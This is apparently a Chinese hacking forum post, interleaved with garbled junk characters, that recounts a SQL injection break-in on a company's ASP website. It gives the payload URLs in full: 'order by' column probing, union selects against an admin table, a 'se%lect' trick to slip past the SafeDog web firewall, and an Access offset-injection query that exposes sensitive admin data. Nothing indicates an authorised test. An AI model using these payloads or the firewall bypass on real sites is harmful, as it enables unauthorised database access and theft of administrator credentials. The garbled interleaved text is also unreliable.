打开网站,一个企业站。
' S) d6 X; B$ L
. ^( D+ Y3 o C1 S2 s, k/ w
2 L' i8 K+ H. v% G6 y2 q; r1 I" |) {顺手加个admin
1 d3 u" {6 E' B8 g
; d7 d+ ]. p M
+ Z0 K& v+ O s1 t默认后台。% x: [. _9 _; [$ D4 R- D
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。% M: o) S6 A4 w4 N$ _
& O9 J+ ~7 n* V
$ ~: E/ j$ n) M3 K5 p) n. H
% V U6 I- s8 R- t+ x5 b所以就不用御剑扫了,待会直接封IP。
9 l# N1 J- x& @9 x V : c j( G2 j- Q. p/ `5 N) s& S
用order by语句判断是否存在注入。
5 N0 I) e' X6 T' U c; nhttp://www.xxx.com /product_show.asp?id=997 order by 16 _1 F, Z9 K3 t W* I7 H' ]# r! o" M
http://www.xxx.com /product_show.asp?id=997 order by 1005 L# H z A. A; D1 E& U, P
现在存在注入,经测试后发现是9个字段。
% T3 d0 i1 x/ Z: g l: Z7 J
& x8 d. J, ]* I接下来进行联合查询,猜是否存在admin表。: e" n) O3 k; l# a
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
8 K+ P+ f7 k* F3 o' X5 D7 e3 u* |: W# A7 G( V& |
: E( C1 `6 [6 K8 L; A
) ^/ b& J( q; @% d& ?3 `在select中间加个%,se%lect绕过安全狗。
: c3 |! |% }3 H) ~1 g5 O1 Y3 l/ Y8 P) N; I0 \8 W
8 z: `$ ~9 ]* D; Y3 S6 G Z/ {发现存在admin表,然后开始手工猜常用的字段。
/ O: A% [& Q Y& ]) P% \纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
4 P/ w7 ~- R, B6 o; h: K. U % n/ B$ b, c. y
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。8 f: ?0 p0 U& m6 O, [" [
/ O0 _$ j* F# `4 c7 K' R% f0 V8 u
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
* r6 w. B: h$ |& [' L7 |http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin- Z5 I4 m* K( R+ L( C
好了,敏感内容出显了。! S) ?# h$ g6 O& i+ [# ]4 V1 |
# V7 R. P3 O+ y0 Q
- N4 o* d: z* G/ H& G; N9 g7 r
9 g/ |, b4 S2 s) W; p9 q2 g7 B2 Y$ A |